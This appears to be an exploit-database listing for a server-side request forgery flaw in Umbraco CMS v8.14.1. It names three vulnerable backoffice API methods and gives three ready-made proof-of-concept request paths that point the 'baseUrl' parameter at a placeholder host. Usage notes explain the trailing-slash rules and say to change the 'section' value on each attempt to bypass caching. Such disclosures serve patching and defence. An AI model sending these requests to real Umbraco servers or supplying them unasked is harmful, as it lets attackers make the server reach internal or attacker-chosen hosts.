Exploit for Umbraco 8.14.1 Server-Side Request Forgery

Name: Exploit for Umbraco 8.14.1 Server-Side Request Forgery
Rating: 5 (360 reviews)
2021-10-29 | CVSS 0.7
## https://sploitus.com/exploit?id=PACKETSTORM:164701
# Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF  
# Date: July 5, 2021  
# Exploit Author: NgoAnhDuc  
# Vendor Homepage: https://our.umbraco.com/  
# Software Link: https://our.umbraco.com/download/releases/8141  
# Version: v8.14.1  
# Affect: Umbraco CMS v8.14.1, Umbraco Cloud  
  
Vulnerable code:  
  
Umbraco.Web.Editors.HelpController.GetContextHelpForPage():  
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14  
Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent():  
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50  
Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss():  
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91  
  
PoC:  
  
/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE  
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=  
https://SSRF-HOST.EXAMPLE/  
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/  
  
Notes:  
- There's no "/" suffix in payload 1  
- "/" suffix is required in payload 2 and payload 3  
- "section" parameter value must be changed each exploit attempt